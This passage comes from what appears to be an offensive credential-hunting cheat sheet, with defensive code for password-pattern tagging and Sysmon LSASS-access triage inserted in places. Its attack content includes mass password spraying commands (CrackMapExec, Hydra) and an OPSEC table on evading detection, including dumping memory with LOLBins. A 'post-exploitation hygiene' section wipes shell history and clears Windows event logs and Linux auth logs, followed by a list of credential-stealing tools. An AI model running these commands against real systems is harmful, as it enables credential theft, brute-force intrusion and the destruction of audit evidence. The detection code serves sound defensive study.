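    for _, password in records:
        m = WORD_NUMBER_RE.match(password)
        if m:
            suffixes.setdefault(m.group(1).lower(), set()).add(m.group(2))
    tagged = {}
    for account, password in records:
        family = classify_password(password, company_names)
        m = WORD_NUMBER_RE.match(password)
        if m and len(suffixes[m.group(1).lower()]) > 1:
            family = "incremental"
        tagged[account] = family
    return tagged

# Constructed sample credential log (the same shape as the table above).
SAMPLE_RECORDS = [("admin", "Summer2024!"), ("svc_backup", "Pass123"), ("svc_sql", "Pass124"),
                  ("j.doe", "Contoso123"), ("helpdesk", "1qaz2wsx"), ("guest", "changeme"),
                  ("r.roe", "X7#kq2!pLm9v")]
```

The same routine works on the output of a defensive password audit, where the "incremental" tag across accounts is the signal that a single helpdesk or provisioning habit is behind several weak passwords.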
Credential Testing Methodology¶
Safe Credential Validation
Windows Testing:
# Test local authentication
net use \\localhost\c$ /user:administrator Password123
# Test domain authentication
net use \\dc01\c$ /user:domain\username Password123
# PowerShell credential object
$cred = Get-Credential
Test-ComputerSecureChannel -Credential $cred
# WMI test
Get-WmiObject -Class Win32_ComputerSystem -ComputerName target -Credential $cred
# CrackMapExec for mass testing
crackmapexec smb targets.txt -u users.txt -p passwords.txt --continue-on-success
Linux Testing:
# SSH test
ssh user@target "whoami"
sshpass -p 'password' ssh user@target
# Database test
mysql -u root -p'password' -e "SELECT 1"
PGPASSWORD='password' psql -U postgres -c "SELECT 1"
# SMB test
smbclient -L //target -U username%password
# Mass testing with Hydra
hydra -L users.txt -P passwords.txt ssh://target
Defensive Considerations¶
OPSEC During Credential Hunting
Detection Triggers to Avoid:
| Activity | Detection Method | Mitigation |
|---|---|---|
| LSASS access | Sysmon Event 10 | Use indirect methods |
| Registry queries | Audit logs | Query specific keys only |
| File system scanning | EDR behavioral | Limit scope, go slow |
| Browser credential access | Process injection detection | Use built-in tools |
| Memory dumping | WER, Sysmon | Use LOLBins |
| Mass authentication attempts | Account lockout | Test carefully |
| Service enumeration | Network monitoring | Passive collection first |
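Seen from the blue-team side of the first two rows, the LSASS signal is Sysmon Event ID 10 (ProcessAccess): the GrantedAccess mask says whether the opener could read memory, the CallTrace says whether a minidump library or unbacked code was on the stack, and the SourceImage path says whether the caller is a known system binary. The triage below is an added example, not code from the original cheat sheet or from Sysmon; the allowlist, the DLL indicator list and `SAMPLE_EVENTS` are constructed assumptions to be tuned per estate.

```python
# Access rights (winnt.h) for reading or tampering with memory: CREATE_THREAD, VM_OPERATION,
# VM_READ, VM_WRITE, DUP_HANDLE.
MEMORY_ACCESS_MASK = 0x0002 | 0x0008 | 0x0010 | 0x0020 | 0x0040
# Assumed allowlist of system binaries that routinely open lsass.exe; tune per estate.
BENIGN_SOURCES = {r"c:\windows\system32\csrss.exe", r"c:\windows\system32\wininit.exe",
                  r"c:\windows\system32\wbem\wmiprvse.exe", r"c:\windows\system32\svchost.exe"}
# DLLs in the CallTrace that point at a minidump being written (MiniDumpWriteDump lives in
# dbghelp/dbgcore; comsvcs.dll exports the MiniDump entry point used in the page above).
DUMP_DLLS = ("dbgcore.dll", "dbghelp.dll", "comsvcs.dll")
USER_WRITABLE = ("\\users\\", "\\programdata\\", "\\windows\\temp\\")

def assess_lsass_access(event):
    """Score one Sysmon Event ID 10 (ProcessAccess) record; return an alert dict or None."""
    if not event["TargetImage"].lower().endswith("\\lsass.exe"):
        return None
    access = int(event["GrantedAccess"], 16)
    if not access & MEMORY_ACCESS_MASK:
        return None                      # e.g. 0x1400: query-only rights, routine noise
    source, trace = event["SourceImage"], event.get("CallTrace", "")
    high = ["call stack from unbacked memory (possible injected code)"] if "UNKNOWN" in trace else []
    if any(dll in trace.lower() for dll in DUMP_DLLS):
        high.append("minidump library in call stack")
    if source.lower() in BENIGN_SOURCES and not high:
        return None                      # allowlisted binary behaving normally
    reasons = list(high)
    if any(p in source.lower() for p in USER_WRITABLE):
        reasons.append("source binary in user-writable path")
    if not reasons:
        reasons.append("memory-access rights on lsass.exe from a non-allowlisted process")
    return {"source": source, "access": hex(access), "severity": "high" if high else "medium", "reasons": reasons}

def triage(events):
    """Run the check over a batch of records; high-severity alerts come first."""
    alerts = [a for a in map(assess_lsass_access, events) if a]
    return sorted(alerts, key=lambda a: a["severity"] != "high")

# Constructed sample records using Sysmon Event ID 10 field names (not real telemetry).
LSASS = r"C:\Windows\system32\lsass.exe"
SAMPLE_EVENTS = [
    {"SourceImage": r"C:\Windows\system32\wbem\wmiprvse.exe", "TargetImage": LSASS,
     "GrantedAccess": "0x1400", "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d2b4"},
    {"SourceImage": r"C:\Users\bob\Downloads\procdump.exe", "TargetImage": LSASS,
     "GrantedAccess": "0x1FFFFF", "CallTrace": r"C:\Windows\SYSTEM32\dbgcore.dll+1a2b3"},
    {"SourceImage": r"C:\Windows\System32\rundll32.exe", "TargetImage": LSASS,
     "GrantedAccess": "0x1FFFFF", "CallTrace": r"C:\Windows\System32\comsvcs.dll+1f3a2"},
    {"SourceImage": r"C:\Windows\System32\svchost.exe", "TargetImage": LSASS,
     "GrantedAccess": "0x1010", "CallTrace": r"ntdll.dll+9d2b4|UNKNOWN(000001D4B2A30000)"},
    {"SourceImage": r"C:\Tools\inventory-agent.exe", "TargetImage": LSASS,
     "GrantedAccess": "0x1010", "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d2b4"},
]
```

Event ID 10 carries no command line, so the rundll32 case is caught through comsvcs.dll on the call stack rather than through its arguments; pair this with a process-creation rule if the command line matters.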
Cleanup After Credential Hunting¶
Post-Exploitation Hygiene
# Windows cleanup
# Clear PowerShell history
Remove-Item (Get-PSReadlineOption).HistorySavePath
Clear-History
# Remove artifacts
Remove-Item C:\Temp\*.dmp -Force
Remove-Item C:\Temp\*.txt -Force
# Clear event logs (if authorized)
wevtutil cl Security
wevtutil cl System
wevtutil cl Application
# Linux cleanup
# Clear bash history
history -c
cat /dev/null > ~/.bash_history
# Remove artifacts
rm -f /tmp/*.dump
rm -f /tmp/*.txt
# Clear logs (if authorized)
> /var/log/auth.log
> /var/log/syslog
Tool Resources & Updates¶
Essential Tool Repositories
Windows Tools:
- Seatbelt: https://github.com/GhostPack/Seatbelt
- LaZagne: https://github.com/AlessandroZ/LaZagne
- SessionGopher: https://github.com/Arvanaghi/SessionGopher
- SharpDPAPI: https://github.com/GhostPack/SharpDPAPI
- Snaffler: https://github.com/SnaffCon/Snaffler
- WinPEAS: https://github.com/carlospolop/PEASS-ng
Linux Tools:
- LinPEAS: https://github.com/carlospolop/PEASS-ng
- LSE: https://github.com/diego-treitos/linux-smart-enumeration
- LinEnum: https://github.com/rebootuser/LinEnum
- Mimipenguin: https://github.com/huntergregal/mimipenguin
- LaZagne Linux: https://github.com/AlessandroZ/LaZagne
Multi-Platform:
- CrackMapExec: https://github.com/byt3bl33d3r/CrackMapExec
- Metasploit modules: post/windows/gather/credentials/*
- Empire modules: collection/chromedump, collection/foxdump
Final Tips & Tricks¶
Pro Tips
- Always check the obvious first - Desktop, Documents, temp folders
- Password reuse is real - Test found passwords everywhere
- Service accounts are goldmines - Often overprivileged
- Don't forget about databases - Connection strings everywhere
- Browser passwords = quick wins - Especially on workstations
- Git repositories contain secrets - .git folders are treasure troves
- Backup files have old passwords - Often still valid
- Memory is the ultimate source - When in doubt, dump it
- Document everything - You'll need it for the report
- Automate but verify - Tools miss things, manual checks matter
Common Mistakes to Avoid
- Don't spray passwords without checking lockout policy
- Don't dump LSASS on production without permission
- Don't modify files unless necessary
- Don't forget to check both x86 and x64 Program Files
- Don't ignore error messages - they often contain paths
- Don't skip "encrypted" passwords - they might be base64
- Don't forget about Unicode/UTF-16 encoded files
- Don't overlook environment variables in scheduled tasks
Reporting Template¶
Credential Finding Documentation
## Credential Discovery - [System Name]
### Finding Summary
- **Credential Type**: [Plaintext/Hash/Key]
- **Account**: [Username/Service]
- **Source**: [File path/Registry/Memory]
- **Privileges**: [Local Admin/Domain User/Service]
### Discovery Method
1. Initial enumeration revealed...
2. Further investigation showed...
3. Credential extracted using...
### Evidence
[Screenshot or command output]
### Impact
This credential provides access to...
### Recommendations
- Implement [specific control]
- Review [configuration/policy]
- Consider [security measure]